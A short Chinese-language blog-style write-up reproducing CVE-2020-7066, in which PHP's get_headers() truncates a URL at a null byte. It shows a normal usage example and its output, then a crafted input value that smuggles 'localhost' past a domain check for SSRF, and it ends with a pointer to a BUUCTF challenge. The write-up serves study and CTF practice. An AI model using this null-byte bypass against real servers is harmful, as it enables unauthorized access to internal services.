[漏洞复现] CVE-2020-7066

PHP 
7.2.29之前的7.2.x版本、
7.3.16之前的7.3.x版本、
7.4.4之前的7.4.x版本中的
‘get_headers()’函数存在安全漏洞。可以用来绕WAF，SSRF利用

get_headers()

 get_headers ( string $url , int $format = 0 , resource $context = ? )
 : array

示例 #1 get_headers() 例子

<?php
$url = ‘https://www.cnblogs.com/Ky1226/‘;
print_r(get_headers($url));
print_r(get_headers($url, 1));
?>

输出

Array ( 
[0] => HTTP/1.1 200 OK 
[1] => Date: Tue, 26 Jan 2021 11:28:56 GMT 
[2] => Content-Type: text/html; charset=utf-8 
[3] => Connection: close 
[4] => Vary: Accept-Encoding 
[5] => Strict-Transport-Security: max-age=2592000; includeSubDomains; preload ) 

Array ( 
[0] => HTTP/1.1 200 OK 
[Date] => Tue, 26 Jan 2021 11:28:56 GMT 
[Content-Type] => text/html; charset=utf-8 
[Connection] => close 
[Vary] => Accept-Encoding 
[Strict-Transport-Security] => max-age=2592000; includeSubDomains; preload ) 

漏洞复现

get_headers()会 截断 URL中 空字符 后的内容

$_GET[‘url‘] = "http://localhost\0.example.com";

注意这里是 "空字符"

BUUCTF地址